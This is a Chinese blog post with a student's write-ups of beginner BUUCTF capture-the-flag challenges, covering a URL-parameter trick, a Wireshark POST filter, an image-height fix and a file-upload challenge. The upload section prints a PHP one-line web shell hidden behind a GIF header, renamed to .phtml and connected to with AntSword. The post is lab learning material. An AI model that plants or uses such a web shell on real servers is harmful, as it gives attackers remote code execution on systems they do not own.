BUUCTF——第一周

已于 2023-08-15 10:57:15 修改
阅读量86 收藏
点赞数
分类专栏: CTF 文章标签: 数学建模
于 2023-06-15 19:28:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74850066/article/details/131162578
版权

有的题不太想写了就先写这么多……

2023/06/13之前

这部分忘记做的时间了……

  • 极客大挑战 2019]Havefun1

有只猫猫

F12看看源码吧

 

 尝试一下在url中整一个     ?cat=dog

 得到flag啦!

flag{e5958bbb-0f58-4ad8-8eb4-0c19ba0e858d}

2023/06/13

  •  Misc wireshark

 下载,然后用wireshark打开,根据提示部分选择查看

http.request.method==POST

得到flag

flag{ffb7567a1d4f4abdffdb54e022f8facd}

  •  Misc 大白

 根据提示,需修改图片大小,不然只能看一部份……

then下载了很多工具

更改一下高度的数据,这里是更改好了的

 

 保存再查看一下照片,得到flag喽

flag{He1|0_d4_ba1}

2023/06/15

web [ACTF2020 新生赛]Upload1

搞一个一句话木马

GIF89a
<script language="php">eval($_POST['shell']);</script>

 利用burp抓包更改传输文件并且将文件后缀名改为.phtml


 

发现给了你一个目录

我们用蚁剑链接

 看一下他这个flag目录下的东西

 

成功拿到flag! 

蒜头味的dacong
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
buuctf——[MRCTF2020]Transform && buuctf——[GWCTF 2019]xxor &&buuctf—— [V&N2020 公开赛]CSRe
Dicked的博客
12-14 783
[MRCTF2020]Transform main函数 数组 model = [0x9, 0x0A, 0x0F, 0x17, 0x7, 0x18, 0x0C, 0x6, 0x1, 0x10, 0x3, 0x11, 0x20, 0x1D, 0x0B, 0x1E, 0x1B, 0x16, 0x4, 0x0D, 0x13, 0x14, 0x15, 0x2, 0x19, 0x5, 0x1F, 0x8, 0x12, 0x1A, 0x1C, 0x0E, 0] model1 = [0x67, 0x79, 0x7B
buuctf——[ACTF新生赛2020]easyre && buuctf——[SUCTF2019]SignIn && buuctf——相册
Dicked的博客
12-02 414
[ACTF新生赛2020]easyre upx,脱
BUUCTF——Web1
2201_75331136的博客
07-17 600
打开靶机,出现以下页面查看源代码发现Secret.php,访问后出现以下页面接着我们使用bp进行抓包在请求头中添加字段发送请求,出现以下页面根据提示更改User-Agent为发送请求,出现以下页面提示要是来自本地的访问请求,联想到127.0.0.1,需要X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。出现flagflag为。
BUUCTF——Basic
计算机硕士的博客
06-16 1577
BUUCTF——Basic(详细版),包括了做题思路和详细步骤。Linux Labs、BUU LFI COURSE 1、BUU BRUTE 1、BUU SQL COURSE 1。
buuctf————findkey
yhfgs的博客
09-18 939
1.查壳。无壳,32位。 2.IDA反编译。 shift+f12查找字符串。发现关键词flag。 跟进。 发现IDA没有反编译成功。手动反编译(p键)。 第一次做的时候按了p就出了。复盘的时候不知道又不行了。 又找了找原因发现是花指令。 (这个位置两个一样的push删掉一个就ok) 3.分析代码。关键函数是sub401005. 根据if条件可得string1(MD5加密后)(看最前面sub40101e函数可知string经过了MD5加密) (a2-748)是0...
BUUCTF——Reverse——Java逆向解密
计算机硕士的博客
01-03 969
BUUCTF——Reverse——Java逆向解密,详细解题步骤。
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1022
buuctf pwn
BUUCTF靶场练习——第二周
weixin_47063945的博客
07-22 562
整理了buuctf靶场第七第八道web题目的做题笔记并整理了涉及到的部分知识和扩展
buuctf——[ACTF新生赛2020]rome && buuctf——[GUET-CTF2019]re && buuctf——[FlareOn4]login
Dicked的博客
12-03 363
[ACTF新生赛2020]rome 加密运算 很像凯撒密码 第二个for循环进行了校验,把输入的值和v15-v30的初始值进行对比。 程序很简单,就是让我们输入一个字符串,然后判断大小写,进行相应的运算,最后得到了程序开头的数组 v15= [ ‘Q’,‘s’,‘w’,‘3’,‘s’,‘j’, ‘’,‘l’,‘z’,‘4’,’’,‘U’,‘j’,‘w’,’@’,‘l’ ] 由于加密运算里的那个%运算的逆运算很神奇,所以我就采取了最简单值观的暴力破解。 v15= [ 'Q','s','w','3','s'
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
2021数学建模A题目–“FAST”主动反射面的形状调节
Xiaoxll12的博客
06-18 817
A 题——“FAST”主动反射面的形状调节 思路:该题主要是通过利用伸缩杆调整FAST反射面,给出合适的调整方案 程序获取 第一题问题思路与结果: 当待观测天体S位于基准球面正上方,结合考虑反射面板调节因素,确定理想抛物面。 思路根据抛物面公式和索引伸缩方向的限制可以获取理想抛物面的形状和实际能实现调整实现的抛物面 第二题问题思路与结果: 当待观测天体时, 确定理想抛物面。 建立反射面板调节模型,调节相关促动器的伸缩量, 使反射面尽量贴近该理想抛物面。将理想抛物面的顶点坐标,以及调
汽车油量监测报警器 (一) 汽车的油箱油量检测通常是由水平检测器
06-18
汽车油量监测报警器 (一) 汽车的油箱油量检测通常是由水平检测器 (一个与仪表板油量计串接的由浮标控制的浮筒式电位器系统)来完成的
健康饮食-菜谱应用-健康食谱-生活方式-健康菜谱小程序-.zip
最新发布
06-18
本资源提供了一个名为“健康菜谱”的小程序开发指南和完整源码,该小程序专为提供健康食谱和营养信息而设计。用户可以通过这个平台了解各种健康美食的制作方法,包括低热量、高蛋白、素食等多种类型的菜品。 主要特点: 丰富的菜谱选择:提供各种健康食谱,包括早餐、午餐、晚餐以及零食等。 详细的营养信息:每个菜谱都配有详细的营养成分分析,帮助用户了解食物的健康价值。 易于操作的界面:界面简洁,用户可以轻松搜索和浏览不同的健康菜谱。 个性化推荐:根据用户的健康需求和饮食偏好提供个性化菜谱推荐。 技术实现: 前端技术:基于微信小程序平台,使用其API和组件库实现动态的用户界面和交互。 后端支持:使用云服务处理菜谱数据的存储、检索和更新。 数据分析:利用用户数据进行菜谱推荐,提高用户满意度和应用的互动性。 应用场景: 健康生活爱好者:适合关注健康饮食的用户,希望通过合理饮食改善健康。 健身人群:为健身者提供高蛋白等特定需求的食谱,支持他们的训练计划。 特殊饮食需求:支持有特殊饮食需求的用户,如糖尿病患者或素食者,提供符合需求的菜谱。
小程序版通过CNN卷积神经网络的服装识别-不含数据集图片-含逐行注释和说明文档.zip
06-18
本代码是基于python pytorch环境安装的。 下载本代码后,有个环境安装的requirement.txt文本 如果有环境安装不会的,可自行网上搜索如何安装python和pytorch,这些环境安装都是有很多教程的,简单的 环境需要自行安装,推荐安装anaconda然后再里面推荐安装python3.7或3.8的版本,pytorch推荐安装1.7.1或1.8.1版本 首先是代码的整体介绍 总共是3个py文件,十分的简便 且代码里面的每一行都是含有中文注释的,小白也能看懂代码 然后是关于数据集的介绍。 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01数据集文本生成制作.py,是将数据集文件夹下的图片路径和对应的标签生成txt格式,划分了训练集和验证集 运行02深度学习模型训练.py,
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值